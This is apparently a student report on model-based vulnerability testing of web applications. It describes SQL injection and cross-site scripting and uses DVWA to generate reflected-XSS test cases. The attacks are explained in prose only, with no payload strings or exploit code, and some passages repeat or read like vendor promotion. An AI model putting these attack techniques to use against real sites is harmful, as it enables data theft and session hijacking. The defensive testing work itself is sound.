39
Model-Based Vulnerability Testing ABSTRACT This paper deals with an original approach to automate Model- Based Vulnerability Testing (MBVT) for Web applications, which aims at improving the accuracy and precision of vulnerability testing. Today, Model-Based Testing techniques are mostly used to address functional features. The adaptation of such techniques for vulnerability testing defines novel issues in this research domain. In this paper, we describe the principles of our approach, which is based on a mixed modelling of the application under test: the specification indeed captures some behavioural aspects of the Web application, and includes vulnerability test purposes to drive the test generation algorithm. This approach is illustrated with the widely-used DVWA example. This topic is all about a model-based framework for security vulnerabilities testing. Security vulnerabilities are not only related to security functionalities at the application level but are sensitive to implementation details. Thus traditional model-based approaches which elide implementation details are by themselves inadequate for testing security vulnerabilities. A framework is proposed that retains the advantages of model based testing that exposes only the necessary details relevant for vulnerability testing. 1

Model based vulnerability testing report

Embed Size (px)

DESCRIPTION

 

Citation preview

Page 1: Model based vulnerability testing report

Model-Based Vulnerability Testing

ABSTRACT

This paper deals with an original approach to automate Model-Based Vulnerability Testing (MBVT) for Web applications, which aims at improving the accuracy and precision of vulnerability testing. Today, Model-Based Testing techniques are mostly used to address functional features. The adaptation of such techniques for vulnerability testing defines novel issues in this research domain. In this paper, we describe the principles of our approach, which is based on a mixed modelling of the application under test: the specification indeed captures some behavioural aspects of the Web application, and includes vulnerability test purposes to drive the test generation algorithm. This approach is illustrated with the widely-used DVWA example. This topic is all about a model-based framework for security vulnerabilities testing. Security vulnerabilities are not only related to security functionalities at the application level but are sensitive to implementation details. Thus traditional model-based approaches which elide implementation details are by themselves inadequate for testing security vulnerabilities. A framework is proposed that retains the advantages of model based testing that exposes only the necessary details relevant for vulnerability testing.

1

Page 2: Model based vulnerability testing report

1. INTRODUCTION1.1 EvolutionThe continued growth of Internet usage as well as the development of Web applications foreground the challenges of IT security, particularly in terms of data confidentiality, data integrity and service availability. Thus, as stated in the annual barometer concerns of Information Technology Managers1, for 72% of them, computer security and data protection are their primary concerns. This growth of risk arises from the mosaic of technologies used in current Web applications (e.g., HTML5), which increases the risk of security breaches. The most common vulnerabilities found on these databases especially emphasize the lack of resistance to code injection of the kind SQL Injection or Cross-Site Scripting (XSS), which have many variants. They appear in the top list of current web applications attacks. Application-level vulnerability testing is first performed by developers, but they often lack the sufficient in depth knowledge in recent vulnerabilities and related exploits. This kind of tests can also be achieved by companies specialized in security testing, in pen-testing (for penetration testing) as instance. These companies monitor the constant discovery of such vulnerabilities, as well as the constant evolution of attack techniques. But they mainly use manual, approaches making the dissemination of their techniques very difficult, and the impact of this knowledge very low. Finally, Web application vulnerability scanners can be used to automate the detection of vulnerabilities, but since they often generate many false positive and false negative results, human verification and investigation are also required.

1.2 MBVT

Model-Based Vulnerability Testing (MBVT) for Web applications, aims at improving the accuracy and precision of vulnerability testing, where accuracy means capability to focus on the relevant part of the software and precision means capability to avoid both false positive and false negative information. MBVT adapted the traditional approach of Model-Based Testing (MBT) in order to generate vulnerability test cases for Web applications.

MBVT is renewing deeply the research questions around MBT. The target is now negative tests (simulating attacks from a malicious agent) and no more positive tests. Automated test generation is driven by ad-hoc Test Purposes capturing vulnerability test patterns. At this stage of our research, this has already strongly impacted the core test generation engine of the MBT technology we are using (Smartesting CertifyIt), which initially was based on model coverage only.

We define a three-model framework: a model or specification of the key aspects of the application, a model of the implementation and a model for automatic test case generation. This separation allows the test case generation process to test contexts missed by other model-based approaches. Web applications are becoming more popular in means of modern information interaction, which leads to a growth of the demand of Web applications. At the same time, Web application vulnerabilities are drastically increasing. One of the most important software security practices that is used to mitigate

2

Page 3: Model based vulnerability testing report

the increasing number of vulnerabilities is security testing. One of the security testing is Model-Based Vulnerability Testing (MBVT). Model-Based Vulnerability Testing (MBVT) for Web applications, aims at improving the accuracy and precision of vulnerability testing

1.3 Focus on MBVT

The work presented in this paper aims to improve the accuracy and precision of vulnerability testing, by means of models (inferred or manually designed) and test patterns, in order to avoid both false positive and false negative. It also allows to automate vulnerability testing of Web applications by capturing vulnerability test patterns, which allow to increase the detection of such vulnerabilities and finally improve the overall level of security.

MBVT is renewing deeply the research questions around MBT. The target is now negative tests (simulating attacks from a malicious agent) and no more positive tests. Automated test generation is driven by ad-hoc Test Purposes capturing vulnerability test patterns. At this stage of our research, this has already strongly impacted the core test generation engine of the MBT technology we are using (Smartesting CertifyIt), which initially was based on model coverage only.

This high-level model, which defines the input of the MBT process, specifies the behaviours of the functions offered by the SUT, independently of how these functions have been implemented. The generated test cases from such models allow to validate the behavioural aspects of the SUT by comparing back-to-back the results observed on the SUT with those specified by the model. MBT aims thus to ensure that the final product conforms to the initial functional requirements. It promises higher quality and conformance to the respective functional requirements, at a reduced cost, through increased coverage (especially about stimuli combination) and increased automation of the testing process. However, if this technique is used to cover the functional requirements specified in the behavioural model of the SUT, it is also limited to this scope, since what is not modelled will not be tested.

1.4 Need of MBVTWeb application vulnerability scanners aim to detect vulnerabilities by injecting attack vectors. These tools generally include three main components [10]: a crawler module to follow web links and URLs in the web application in order to retrieve injection points, an injection module which analyses web pages, input points to inject attack vectors (such as code injection), and an analysis module to determine possiblevulnerabilities based on the system response after attack vector injection. This approach allows testing an application among the four types of attacks: Blind and Not Blind SQL Injection, Reflected/Stored XSS.

3

Page 4: Model based vulnerability testing report

2. WEB APPLICATION VULNERABILITYVulnerability refers to the inability to withstand the effects of a hostile environment. A window of vulnerability (WoV) is a time frame within which defensive measures are reduced, compromised or lacking.In computer security, a vulnerability is a weakness which allows an attacker to reduce a system's information assurance.Vulnerability is the intersection of three elements: a system susceptibility or flaw, attacker access to the flaw, and attacker capability to exploit the flaw.To exploit a vulnerability, an attacker must have at least one applicable tool or technique that can connect to a system weakness. In this frame, vulnerability is also known as the attack surface.Vulnerability management is the cyclical practice of identifying, classifying, remediating, and mitigating vulnerabilities". This practice generally refers to software vulnerabilities in computing systems.A security risk may be classified as a vulnerability. The use of vulnerability with the same meaning of risk can lead to confusion. The risk is tied to the potential of a significant loss. Then there are vulnerabilities without risk: for example when the affected asset has no value. A vulnerability with one or more known instances of working and fully implemented attacks is classified as an exploitable vulnerability — a vulnerability for which an exploit exists. The window of vulnerability is the time from when the security hole was introduced or manifested in deployed software, to when access was removed, a security fix was available/deployed, or the attacker was disabled—see zero-day attack.Security bug (security defect) is a narrower concept: there are vulnerabilities that are not related to software: hardware, site, personnel vulnerabilities are examples of vulnerabilities that are not software security bugs.Constructs in programming languages that are difficult to use properly can be a large source of vulnerabilities.Web application vulnerability scanners aim to detect vulnerabilities by injecting attack vectors. These tools generally include three main components [10]: a crawler module to follow web links and URLs in the web application in order to retrieve injection points, an injection module which analyses web pages, input points to inject attack vectors (such as code injection), and an analysis module to determine possiblevulnerabilities based on the system response after attack vector injection.As the Web grows increasingly social in nature, inversely, it becomes less secure. In fact, the Web Application Security Consortium (WASC) estimated in early 2009 that 87% of all Web sites were vulnerable to attack (see Resources for links to more information). Although some companies can afford to hire outside security analysts to test for exploits, not everyone has the resources to spend US$20,000 to US$40,000 for an outside security audit. Instead, organizations become reliant on their own developers to understand these threats and make sure their code is devoid of any such vulnerability.

2.1. Common VulnerabilitiesThe two most common risks in the Web environment, injection-namely SQL injection, which lets attackers alter SQL queries sent to a database-and cross-site

4

Page 5: Model based vulnerability testing report

scripting (XSS), are also two of the most dangerous (Category:OWASP_Top_Ten_Project). Injection attacks take advantage of improperly coded applications to insert and execute attacker-specified commands, enabling access to critical data and resources. XSS vulnerabilities exist when an application sends user-supplied data to a Web browser without first validating or encoding that content.

2.2 SQL InjectionSQL Injection is one of the many web attack mechanisms used by hackers to steal data from organizations. It is perhaps one of the most common application layer attack techniques used today. It is the type of attack that takes advantage of improper coding of your web applications that allows hacker to inject SQL commands into say a login form to allow them to gain access to the data held within your database.In essence, SQL Injection arises because the fields available for user input allow SQL statements to pass through and query the database directly.Web applications allow legitimate website visitors to submit and retrieve data to/from a database over the Internet using their preferred web browser. Databases are central to modern websites – they store data needed for websites to deliver specific content to visitors and render information to customers, suppliers, employees and a host of stakeholders. User credentials, financial and payment information, company statistics may all be resident within a database and accessed by legitimate users through off-the-shelf and custom web applications. Web applications and databases allow you to regularly run your business.

SQL Injection is the hacking technique which attempts to pass SQL commands (statements) through a web application for execution by the backend database. If not sanitized properly, web applications may result in SQL Injection attacks that allow hackers to view information from the database and/or even wipe it out.Such features as login pages, support and product request forms, feedback forms, search pages, shopping carts and the general delivery of dynamic content, shape modern websites and provide businesses with the means necessary to communicate with prospects and customers. These website features are all examples of web applications which may be either purchased off-the-shelf or developed as bespoke programs.These website features are all susceptible to SQL Injection attacks which arise because the fields available for user input allow SQL statements to pass through and query the database directly.Take a simple login page where a legitimate user would enter his username and password combination to enter a secure area to view his personal details or upload his comments in a forum.When the legitimate user submits his details, an SQL query is generated from these details and submitted to the database for verification. If valid, the user is allowed access. In other words, the web application that controls the login page will communicate with the database through a series of planned commands so as to verify the username and password combination. On verification, the legitimate user is granted appropriate access.Through SQL Injection, the hacker may input specifically crafted SQL commands with the intent of bypassing the login form barrier and seeing what lies behind it.

5

Page 6: Model based vulnerability testing report

This is only possible if the inputs are not properly sanitised (i.e., made invulnerable) and sent directly with the SQL query to the database. SQL Injection vulnerabilities provide the means for a hacker to communicate directly to the database.The technologies vulnerable to this attack are dynamic script languages including ASP, ASP.NET, PHP, JSP, and CGI. All an attacker needs to perform an SQL Injection hacking attack is a web browser, knowledge of SQL queries and creative guess work to important table and field names. The sheer simplicity of SQL Injection has fuelled its popularity.2.2.1 Blind SQL Injection Blind SQL (Structured Query Language) injection is a type of SQL Injection attack that asks the database true or false questions and determines the answer based on the applications response. This attack is often used when the web application is configured to show generic error messages, but has not mitigated the code that is vulnerable to SQL injection.When an attacker exploits SQL injection, sometimes the web application displays error messages from the database complaining that the SQL Query's syntax is incorrect. Blind SQL injection is nearly identical to normal SQL Injection, the only difference being the way the data is retrieved from the database. When the database does not output data to the web page, an attacker is forced to steal data by asking the database a series of true or false questions. This makes exploiting the SQL Injection vulnerability more difficult, but not impossible.Blind SQL Injection is used when a web application is vulnerable to an SQL injection but the results of the injection are not visible to the attacker. The page with the vulnerability may not be one that displays data but will display differently depending on the results of a logical statement injected into the legitimate SQL statement called for that page. This type of attack can become time-intensive because a new statement must be crafted for each bit recovered. There are several tools that can automate these attacks once the location of the vulnerability and the target information has been established.

2.3 Cross-Site ScriptingCross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications. XSS enables attackers to inject client-side script into Web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy. Cross-site scripting carried out on websites accounted for roughly 84% of all security vulnerabilities documented by Symantec as of 2007. Their effect may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data handled by the vulnerable site and the nature of any security mitigation implemented by the site's owner.Cross-Site Scripting (XSS) attacks occur when:

a. Data enters a Web application through an untrusted source, most frequently a web request.

b. The data is included in dynamic content that is sent to a web user without being validated for malicious code.

The malicious content sent to the web browser often takes the form of a segment of JavaScript, but may also include HTML, Flash or any other type of code that the browser may execute. The variety of attacks based on XSS is almost limitless, but they commonly include transmitting private data like cookies or other session

6

Page 7: Model based vulnerability testing report

information to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user's machine under the guise of the vulnerable site.Historically XSS was first found in applications that performed all data processing on the server side. User input (including XSS vector) would be sent to server, and then sent back to the user as web page. Need for improved user experience resulted in popularity of applications with majority of the presentation logic in JavaScript working client-side and pulling data on-demand from the server using AJAX.As the JavaScript code was also processing user input and rendering it in the web page content, a new sub-class of reflected XSS attacks started to be found that was called DOM-based cross-site scripting. In the DOM-based XSS the malicious data does not touch the web server and it's being reflected by the JavaScript code, fully on the client side.

2.3.1 Stored XSS AttacksStored attacks are those where the injected code is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc. The victim then retrieves the malicious script from the server when it requests the stored information.Stored cross-site scripting vulnerabilities arise when data which originated from any tainted source is copied into the application's responses in an unsafe way. An attacker can use the vulnerability to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the relevant application content.The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes.Methods for introducing malicious content include any function where request parameters or headers are processed and stored by the application, and any out-of-band channel whereby data can be introduced into the application's processing space (for example, email messages sent over SMTP which are ultimately rendered within a web mail application).Stored cross-site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach targe users, and they can potentially be exploited to create web application worms which spread exponentially amongst application users.

Note that automated detection of stored cross-site scripting vulnerabilities cannot reliably determine whether attacks that are persisted within the application can be accessed by any other user, only by authenticated users, or only by the attacker themselves. You should review the functionality in which the vulnerability appears to determine whether the application's behaviour can feasibly be used to compromise other application users.In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

a. Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email

7

Page 8: Model based vulnerability testing report

addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.

b. User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

2.3.2 Reflected XSS AttackReflected attacks are those where the injected code is reflected off the web server, such as in an error message, search result, or any other response that includes some or all of the input sent to the server as part of the request. Reflected attacks are delivered to victims via another route, such as in an e-mail message, or on some other web server. When a user is tricked into clicking on a malicious link or submitting a specially crafted form, the injected code travels to the vulnerable web server, which reflects the attack back to the user’s browser. The browser then executes the code because it came from a "trusted" server.Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

8

Page 9: Model based vulnerability testing report

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

a. Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.

b. User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

2.4 Web Vulnerability Testing needs to be automatedIf web application security testing is not automated using a proven automated web application security scanner that can test for thousands of potential security flaws, some if not all of the serious web application vulnerabilities can be overlooked. Web security testing goes from being a seemingly benign IT project to a serious business liability. For example, imagine a custom made web based enterprise resource planning (ERP) system. Such system would have hundreds, if not thousands of visible entry points or attack surfaces and many other “under the hood” that need to be checked for web application vulnerabilities such as SQL injection and cross-site scripting.Using real life numbers, imagine the ERP system has 200 entry points that need to be checked against 100 different web application vulnerability variants. That means that the penetration tester needs to launch at least 20,000 security tests. If every test had to take just 5 minutes to complete, it would take a web security specialist around 208 business days to complete a proper web application security audit of an ERP system.An automated web application security scanner such as Netsparker can scan a much bigger custom ERP systems against a much bigger number of web application vulnerability variants in a matter of hours. And unlike a human, an automated security scanner will not forget to scan an input parameter or get bored while trying different variations of a particular attack.When doing a manual web application security test, you are also restricting the penetration to a number of known vulnerabilities known to the penetration tester. On the other hand, when using an automated web vulnerability scanner such as Netsparker you are making sure that all parameters are being checked against all type of web application security variants. By using Netsparker you are also ensuring that no false positives are reported in the web application security scan results, therefore you do not need to allocate time to validating detected vulnerabilities. Underscoring the importance of vulnerability testing automation are the popular information security studies. Year after year this research points to the same underlying causes of information risks such as insufficient resources, lack of visibility, and uninformed management. Each of these elements can be addressed by automating security testing processes.

9

Page 10: Model based vulnerability testing report

There’s no perfect way to test for web security vulnerabilities. However, one thing is for sure: going about it manually and relying on staff expertise alone can be an exercise in futility that you cannot afford to take on because it might cost your business a lot of money and some web application vulnerabilities might go undetected. Do what’s best for your business and integrate automation into the web vulnerability testing discussion and into web applications software development life cycle. When using an automated web application security scanner you find more and better vulnerabilities.There are issues where automation will not help you and manual testing needs to take place, but you don’t want your security team to check an input for 100 different possible issues one HTTP request at a time or by trying to analyze the output of a fuzzer. Free your team members’ time so they can focus their efforts to the tasks that actually will benefit from their expertise.

3. MODEL-BASED VULNERABILITY TESTING

We propose to revisit and adapt the traditional approach of Model-Based Testing (MBT) in order to generate vulnerability test cases for Web applications. This adapted approach is called Model-Based Vulnerability Testing (MBVT). In this section, we firstly describe the specificities of the MBVT approach. Secondly, we introduce the DVWA example used in the rest of the paper to illustrate the MBVT approach, and finally, we define the scope of the experiments conducted on this example.

3.1 Principles of MBVT Approach

MBT (Model-Based Testing) is an increasingly widely-used approach that has gained much interest in recent years, from academic as well as industrial domain, especially by increasing and mastering test coverage, including support for certification, and by providing the degree of automation needed for shortening the testing execution time. MBT refers to a particular approach of software testing techniques in which both test cases and expected results are automatically derived from a high-level model of the System Under Test (SUT). This high-level model, which defines the input of the MBT process, specifies the behaviours of the functions offered by the SUT, independently of how these functions have been implemented. The generated test cases from such models allow to validate the behavioural aspects of the SUT by comparing back-to-back the results observed on the SUT with those specified by the model. MBT aims thus to ensure that the final product conforms to the initial functional requirements. It promises higher quality and conformance to the respective functional requirements, at a reduced cost, through increased coverage (especially about stimuli combination) and increased automation of the testing process. However, if this technique is used to cover the functional requirements specified in the behavioural model of the SUT, it is also limited to this scope, since what is not modelled will not be tested.

The use of MBT techniques to vulnerability testing requires to adapt both the modelling approach and the test generation computation. Within the traditional MBT process, which allows to generate functional test cases, positive test cases are computed to validate the SUT in regards to its functional requirements. Within vulnerability testing

10

Page 11: Model based vulnerability testing report

approach, negative test cases have to be produced: typically, attack scenarios to obtain data from the SUT in an unauthorized manner. The proposed process to perform vulnerability testing, depicted in Figure I, is composed of the four following activities:

Fig. I. Model-Based Vulnerability Test Process

i. Test purposes activity: consists in formalizing test purposes from vulnerability test patterns that the generated test cases have to cover;

ii. Modelling activity: aims to define a model that captures the behavioural aspects of the SUT in order to generate consistent (from a functional point of view) sequences of stimuli;

iii. Test Generation and Adaptation activity: consists in automatically producing abstract test cases from the artefacts defined during the two previous activities;

iv. Concretization, Test Execution and Observation activity: aims to a. translate the generated abstract test cases into executable

scripts,b. to execute these scripts on the SUT, c. to observe the SUT responses and to compare them to the

expected results in order to assign the test verdict and automate the detection of vulnerabilities.

All these MBVT activities are supported by a dedicated tool chain, which is based on an existing MBT software named CertifyIt provided by the company Smartesting. This software is a test generator that takes as input a test model, written with a subset of UML (called UML4MBT [1]), which captures the behaviour of the SUT. More concretely, a UML4MBT model consists of:

a. UML class diagrams to represent the static view of the system (with classes, associations, enumerations, class attributes and operations),

b. UML Object diagrams to list the concrete objects used to compute test cases and to define the initial state of the SUT, and

c. state diagrams (annotated with OCL constraints) to specify the dynamic view of the SUT. Each generated test case is typically an abstract sequence of high-level actions from the UML4MBT models.

11

Page 12: Model based vulnerability testing report

These generated test sequences contain the sequence of stimuli to be executed, but also the expected results (to perform the observation activity), obtained by resolving the associated OCL constraints.

4. DAMN VULNERABLE WEB APPLICATIONIn order to evaluate the effectiveness and efficiency of our approach, we have applied it on a Web application called DVWA (Damn Vulnerable Web Application). This open-source Web application test bed is based on PHP/MySQL. It can also be used to test web security testing tools, like vulnerability scanners for instance. DVWA embeds several vulnerabilities, notably vulnerabilities of the kind SQL Injection and Blind SQL Injection, and Reflected and Stored XSS. These vulnerabilities are commonly used to attack current Web applications. Each vulnerability has a dedicated menu item leading to a dedicated page. DVWA also embeds three security levels: low, medium, and high. Each level carries different security protections: the lowest level has no protection at all, the medium level is a refined version but is still quite vulnerable, and the highest level is a properly secured version. Users can choose which level they want to work with by specifying it through the application. It is also possible to view and compare the source code of each security level.To ease the understanding, we focus on the Reflected XSS attack (RXSS). It is one of the major breach because it is highly used and because its exploitation leads to severe risks (such as identity spoofing).Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

An XSS attack targets end-users. This kind of attack happens when a user input (form field, url parameter, cookie value) is used by the server to produce a response. A pirate injects malicious data (such as a script, typically written in JavaScript, which will be executed by an end-user browser) in the Web application through a user input. Lack of user input validations leads to unsecured applications. An XSS attack is either Reflected (the response containing malicious data is immediately produced and sent back to the end-user) or Stored (the malicious data is saved in the application’s database, and retrieved later, in another context). We focus on RXSS vulnerabilities through form fields.

5. MBVT APPROACH ON DVWA

5.1 Formalizing Vulnerability Test Patterns into Test Purposes

Vulnerability Test Patterns (vTP) are the initial artefacts of our approach. A vTP expresses the testing needs and procedures allowing the identification of a particular

12

Page 13: Model based vulnerability testing report

breach in a Web application. There are as much vTP as there are types of application-level breaches. The characteristics of a Vulnerability Test Pattern are: its name, its description, its testing objectives (precising the addressed testing objectives), its prerequisites (precising the conditions and knowledge required for a right execution), its procedure (precising its modus operandi), its observations and its oracle (precising which information has to be monitored in order to identify the presence of an application-level breach), its variants (precising some alternatives regarding the means in use, or the malicious data, or what is observed), its known issues (precising any limitation or problem (e.g., technical) limiting its usage), its affiliated vTP (listing its correlated vTP), its references (to public resources dealing with application-level vulnerability issues, such as CVE, CWE, OWASP, CAPEC, ...). Figure 2 presents the Vulnerability Test Pattern of Reflected XSS attack.

Fig. II vTP of Reflected XSS attacks

For this vTP, variants of malicious data are defined during the modelling activity, variants of the procedure are defined during the adaptation and execution activity. The initial procedure is defined in a test purpose. A test purpose is a high level expression that formalizes a test intention linked to a testing objective to drive the automated test generation on the behavioural model. In the MBVT context, we propose to use test purposes to formalize vTP. Basically, a test purpose is a sequence of important stages to reach. A stage is a set of operations or behaviour to use, or/and a state to reach. Transforming the sequence of stages into a complete test case, based on the model behaviour and constraints, is left to the MBT technology. Furthermore, at the beginning of a test purpose, the test engineer can define iterators. Iterators are used in stages, in order to introduce context variations. Each combination of possible values of iterators

13

Page 14: Model based vulnerability testing report

produces a specific test case. Figure III shows the test purpose formalizing the vTP of Figure II.

Fig.III test Purpose formalizing the vTP fig IIThis schema precises that for all sensible web pages, for all malicious data enabling the detection of RXSS breach, and for all security levels of DVWA, it is required to do thefollowings: a. use any operation to activate the sensible page with the required security level,b. inject the malicious data in all the user inputs of the page, c. check if the page is sensible to the RXSS attack. The three keywords ALL * are

enumerations of values, defined by the security test engineer, allowing him/her to master the final amount of test cases.

We use a second test purpose, similar to the presented one, enabling to precisely target which user input fields have to be injected. This test purpose gives ways of control to the security engineer. Modifications are: a. one added iterator targeting sensible fields, and b. the use of the operation injectField instead of the operation injectAllFields.

5.2 ModellingThe modelling activity produces a model based, on one hand, on the functional specifications of the application, and on the other hand on the test purposes which will be applied to it. We present in the following the used UML diagrams (classes, objects, state diagrams), and their respective usages in the context of our MBVT approach. Class diagrams specify the static aspect of the model, by defining the abstract objects of the SUT. Class diagrams of our approach share many similarities with traditional MBT.Classes model business objects (notably, the SUT class models the system under test, and defines the points of control and observation). Associations model relations between business objects. Enumerations model sets of abstract values, and literals model each value. Class attributes model evolving characteristics of business objects. Class operations model points of control and observation of the SUT.

14

Page 15: Model based vulnerability testing report

Fig. IV Class diagram of the SUT structure, for our MBVT approach

Nevertheless, our MBVT approach differs from the traditional MBT by:a. two additional classes (page and field) and their relations, which respectively

model the general structure of the application and the user input fields potentially used to inject malicious data;

b. some additional operations, coming from the test purposes, which model means to exercise and observe the attack;

c. One additional enumeration which model malicious data injected in user input fields.

The UML state diagram graphically specifies the behavioural aspect of the SUT, modelling the navigations between pages of the Web application. States model Web pages, and transitions model the available navigations between these Web pages. Triggers of transitions are the UML operations of the SUT class. Guards of transitions precisely define the context of firing. Effects of transitions precisely define the modifications induced by the execution of transitions.The UML object diagram models the initial state of the SUT, by instantiating class diagram elements. Thus, instances model business entities available at the initial state of the SUT, and links model relations between these entities. In our MBVT approach, the object diagram models the Web pages of the application and the user input fields of these pages.Figure V presents the class model of the DVWA example

Fig.V Class model of DVWA

15

Page 16: Model based vulnerability testing report

The additional class User models the potential users of the application, class attributes message and security level respectively model application feedbacks and security level, the five first operations model the necessary and sufficient functional subset of the application allowing the access to the tested pages with the relevant level of security, operations injectAllFields and injectField, which are keywords coming from test purposes, model the injection of malicious data on all or part of the user input fields of Web pages, operation checkMessage models the observation of the message attribute; operation checkRXSSAttack models the observation of the attack, and serves as oracle.Moreover, regarding the static aspect of the model, some enumeration literals model malicious data variants: RXSS_DUMMY is a basic variant, RXSS_COOKIE1 andRXSS_COOKIE2 are two variants allowing to retrieve private user information, and RXSS_ WAF EVASION models a variant allowing to bypass some web application firewall techniques. For the time being, we only deal with a few malicious data variants. The main concern is to experiment our approach and evaluate whether it is realistic.Figure VI presents the state diagram, which models the behaviour of DVWA. It defines precedence’s between pages: identification is required before reaching any other page of the application.

Fig.VI State diagram of DVWA Example

Figure VII presents the initial state of the DVWA model. It specifies: (i) one user, with its credentials, and(ii) The pages and user input fields of DVWA.

16

Page 17: Model based vulnerability testing report

Fig.VII Object diagram of DVWA

5.3 Test GenerationThe main purpose of the test generation activity is to produce test cases from both the model and the test purposes. Three phases compose this activity. The first phase transforms the model and the test purposes into elements usable by the Smartesting CertifyIt MBT tool. Notably, test purposes are transformed into test targets, a test target being a sequence of intermediate objectives used by the symbolic generator. Hence, the sequence of stages of a test purpose is mapped to a sequence of intermediate objectives of a test target. Furthermore, this first phase manages the combination of values between iterators of test purposes, such that one test purpose produces as many test targets as possible combinations.The second phase produces the abstract test cases from the test targets. This phase is left to the test case generator. An abstract test case is a sequence of steps, where a step corresponds to a completely valued operation call. An operation call represents either a stimulation or an observation of the SUT. Each test target produces one test case:(i) Verifying the sequence of intermediate objectives and (ii) Verifying the model constraints.Figure VIII presents a test cases obtained from the test purpose of Figure 3.

Fig.VIII Abstract test case example

The five first steps of this test case correspond to the first stage of the test purpose. Finally, the third phase exports the abstract test cases into the execution environment. In our case, it consists on

i. creating a JUnit test suite, where each abstract test case is exported as a JUnit test case, and

ii. creating an interface. This interface defines the prototype of each operation of the SUT.

The implementation of these operations is in charge of the test automation engineer.According to our DVWA example, we are using two test purposes and have defined four malicious data, in order to test one page with one user input field. Each test purpose produces 12 test targets, where each test target produces exactly one abstract test case, for a total amount of 24 abstract test cases.

17

Page 18: Model based vulnerability testing report

Figure VIII presents one of the generated abstract test cases. It has to be interpreted this way:

i. it logs in the application with valid credentials;ii. it sets the security level;

iii. it loads the targeted Web page; iv. it verifies the correct execution of the functional part of the test case

(using the checkMessage observation); v. it injects the malicious datum;

vi. it verifies if there exists an application-level breach or not (using the checkRXSSAttack observation). This last step assigns the verdict of the test case.

Regarding the test purpose focusing on precise user input fields, test cases only differ at step 6, where the injectField operation replaces the injectAllFields operation.

5.4 Adaption and Test ExecutionDuring the modelling activity, each page, user input field, malicious datum, user credentials, etc. ... in summary, all data used by the application, are modelled in an abstract way. Hence, the test suite can’t be executed as it is. The gap between abstract keywords used in abstract test cases and the real API of the SUT must be filled. To ease the understanding of our approach, we only present an adaptation of the kind one-to-one, but tables with multiple values are also used for a mapping of the kind one-to-many.Stimuli must also be adapted. When exporting the abstract test cases, the MBT tool provides an interface defining the signature of each operation. The test automation engineer is in charge to implement the automated execution of each operation of this interface. Because we are testing Web applications, we have studied two ways of automation:

a. At the GUI level: we stimulate and observe the application via the client-side GUI of the application. Even if this technique is time consuming, it could be necessary when the client-side part of the application embeds JavaScript scripts. For this technique, we use the Selenium framework.

b. At the HTTP level: we stimulate and observe the application via HTTP messages send to (and received from) the server-side application. This technique is extremely fast and can be used to bypass HTML and JavaScript limitations. For this technique, we are using the Apache HTTPClient Java library.

The last but not the least activity of the MBVT is to execute the adapted test cases in order to produce a verdict. We introduce a new terminology fitting the characteristics of a test execution:

a. Attack-pass: the complete execution of the test reveals that the application owns a breach, unlike in MBT where a complete execution of a test indicates a valid implementation;

b. Attack-fail: the failure of the execution of the last step reveals that the application is robust to the attack, unlike MBT where such a failure indicates an invalid implementation;

c. Inconclusive: in certain circumstances, it is not sure that a breach is discovered (e.g., due to technical issues). An abnormal event happens, but no breach has been observed.

18

Page 19: Model based vulnerability testing report

According to our DVWA example, the model defines four malicious data dedicated to Reflected XSS attacks. These values are defined in an abstract way, and must be adapted. Each of them is mapped to a concrete value, as shown in Figure XI.

